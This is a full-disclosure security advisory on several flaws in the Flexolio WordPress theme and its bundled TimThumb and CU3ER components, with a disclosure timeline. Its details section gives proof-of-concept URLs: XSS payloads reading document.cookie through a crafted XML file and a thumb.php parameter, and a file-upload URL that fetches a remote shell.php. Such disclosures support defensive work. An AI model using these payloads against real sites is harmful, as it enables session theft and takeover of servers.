WordPress Flexolio XSS / Disclosure / File Upload

`Hello list!  
  
There are Content Spoofing, Cross-Site Scripting, Full path disclosure,   
Abuse of Functionality, Denial of Service and Arbitrary File Upload   
vulnerabilities in Flexolio for WordPress. Which contains TimThumb and   
CU3ER.  
  
In April 2011 I wrote about vulnerabilities in TimThumb   
(http://seclists.org/fulldisclosure/2011/Apr/227) and in April 2014 I wrote   
about vulnerabilities in CU3ER   
(http://seclists.org/fulldisclosure/2014/Apr/244).  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are all versions of Flexolio.  
  
-------------------------  
Affected vendors:  
-------------------------  
  
Quarterpixel  
http://quarterpixel.de  
  
----------  
Details:  
----------  
  
Content Spoofing (Content Injection) (WASC-12):  
  
http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2/1.xml  
  
File 1.xml:  
  
<?xml version="1.0" encoding="UTF-8"?>  
<cu3er>  
<slides>  
<slide>  
<url>1.jpg</url>  
<link>http://websecurity.com.ua</link>  
</slide>  
</slides>  
</cu3er>  
  
Cross-Site Scripting (WASC-08):  
  
http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2  
  
File xss.xml:  
  
<?xml version="1.0" encoding="UTF-8"?>  
<cu3er>  
<slides>  
<slide>  
<url>1.jpg</url>  
<link>javascript:alert(document.cookie)</link>  
</slide>  
</slides>  
</cu3er>  
  
For cross-domain attacks it's needed to have crossdomain.xml at web site   
with xml-files.  
  
Cross-Site Scripting (WASC-08):  
  
http://site/wp-content/themes/flexolio/inc/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E.jpg  
  
Full path disclosure (WASC-13):  
  
http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://  
  
And also Abuse of Functionality and DoS in vulnerabilities in TimThumb   
(http://seclists.org/fulldisclosure/2011/Apr/227) and Arbitrary File Upload   
vulnerability, which was disclosed after 3,5 months after my disclosure of   
previous holes. They are possible in old versions of the theme, because in   
the last versions of the theme in TimThumb the access to remote sites is   
forbidden.  
  
Arbitrary File Upload (WASC-31):  
  
http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://site.com/shell.php  
  
Full path disclosure (WASC-13):  
  
FPD in php-files of the theme (by default) or in error_log. In index.php and   
other php-files.  
  
http://site/wp-content/themes/webfolio/  
  
------------  
Timeline:  
------------   
  
2013.11.22 - announced at my site about CU3ER.  
2013.11.26 - informed developer.  
2013.11.26 - announced at my site about plugins and later about themes.   
Later informed developers of the plugins and themes.  
2014.04.26 - disclosed at my site about Flexolio for WordPress   
(http://websecurity.com.ua/7141/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`